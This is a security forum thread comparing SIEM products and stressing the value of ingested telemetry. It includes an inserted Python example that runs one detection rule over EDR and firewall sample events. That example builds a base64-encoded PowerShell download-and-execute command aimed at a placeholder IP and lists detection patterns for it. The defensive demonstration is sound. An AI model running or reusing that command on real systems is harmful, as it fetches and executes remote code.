CyberIQs Knowledge Centre

SIEM tool

5 Posts
5 Users
1 Likes
283 Views
bharaths
(@bharaths)
Active Member
Joined: 2 years ago
Posts: 6
Topic starter

Would like to have inputs from everyone: which SIEM tool is cost-effective and quickly understandable from a monitoring perspective?

socpuppet
(@socpuppet)
Active Member
Joined: 2 years ago
Posts: 13

Splunk is the boss of the sock 😀

nextCISO
(@nextciso)
Active Member
Joined: 2 years ago
Posts: 6

Wow, this question is like opening a can of worms. I say it because often the SIEM solution is not as important as the telemetry you ingest into the SIEM. Of course, an EDR on the endpoint with ATT&CK signatures and good app and network coverage should get any SIEM to do the work.

I personally have worked with Splunk, RSA NetWitness, LogRhythm and McAfee. The one I see often deployed is Splunk (not a SIEM) and McAfee, which seems a commodity, well-rounded SIEM but nothing in the high end.

patrik_sam
(@patrik_sam)
New Member
Joined: 2 years ago
Posts: 4

Throughout my career I have used ArcSight (a bit dated these days) and Splunk. As already said, the SIEM is just the tool; the telemetry ingested is the real deal.

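The point made in the two replies above (the SIEM is just the tool, what matters is the telemetry you feed it) can be shown concretely by running one detection rule over two different telemetry sets. The following is an added example, not code from the thread or from any of the products named in it. It implements a common ATT&CK T1059.001-style check (PowerShell launched with an encoded command that decodes to a download-and-execute string) and runs it first over constructed EDR process-creation events, then over constructed firewall connection events. The event field names (`image`, `cmdline`, `host`) and all sample events are assumptions made for the example; real EDR and firewall schemas differ.

```python
"""Added example: the same detection rule over EDR telemetry vs. firewall telemetry.

Shows that a rule needing process command lines is fully blind when only
network 5-tuples are ingested, regardless of which SIEM evaluates it.
"""
import base64
import re

# --- Constructed sample telemetry (not real logs) ---------------------------
# The encoded payload is built here so the example is self-contained; PowerShell
# -EncodedCommand expects base64 of a UTF-16LE string.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Hypothetical EDR process-creation events: they carry image path and command line.
EDR_EVENTS = [
    {"source": "edr", "type": "process_create", "host": "ws01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"source": "edr", "type": "process_create", "host": "ws02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"source": "edr", "type": "process_create", "host": "ws03",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Hypothetical firewall events: only the connection tuple, no process context.
FIREWALL_EVENTS = [
    {"source": "fw", "type": "conn", "src": "10.0.0.5", "dst": "203.0.113.7",
     "dport": 80, "action": "allow"},
]

# --- Detection logic ---------------------------------------------------------
REQUIRED_FIELDS = ("image", "cmdline")  # what this rule needs from the telemetry
# -e / -en / -enc / -encodedcommand followed by the base64 blob (PowerShell
# accepts unambiguous prefixes of -EncodedCommand).
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS = re.compile(r"IEX|Invoke-Expression|DownloadString|Net\.WebClient", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_encoded_powershell(events):
    """Run the rule over events.

    Returns (alerts, evaluable): alerts is the list of hits; evaluable is how
    many events even had the fields the rule depends on. evaluable == 0 means
    the telemetry gives this rule no coverage at all.
    """
    alerts = []
    evaluable = 0
    for ev in events:
        if not all(field in ev for field in REQUIRED_FIELDS):
            continue  # rule cannot be applied to this event type
        evaluable += 1
        if not ev["image"].lower().endswith("powershell.exe"):
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded and SUSPICIOUS.search(decoded):
            alerts.append({"host": ev["host"], "decoded": decoded})
    return alerts, evaluable


if __name__ == "__main__":
    for name, events in (("EDR", EDR_EVENTS), ("firewall", FIREWALL_EVENTS)):
        alerts, evaluable = detect_encoded_powershell(events)
        print(f"{name}: {evaluable} evaluable event(s), {len(alerts)} alert(s)")
        for a in alerts:
            print(f"  {a['host']}: {a['decoded']}")
```

Over the EDR set the rule evaluates all three events and fires once (ws01); over the firewall set it evaluates nothing, so the detection gap is a telemetry gap, not a SIEM limitation. The `evaluable` counter is the practical check: a rule that reports zero evaluable events in production is not quietly "clean", it is unfed.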
0day
(@0day)
New Member
Joined: 2 years ago
Posts: 4

The least cost-effective solution mentioned is Splunk, as the cost is prohibitive for many organisations. Splunk's pricing model is based around the data you need to process; traditional SIEMs do not base the price around the data, but around special features to tackle security monitoring and detection issues. As someone said above, Splunk is not a solution specifically designed for the security industry, although it seems to be widely adopted, especially in big enterprises, which are the ones that can stand the high costs.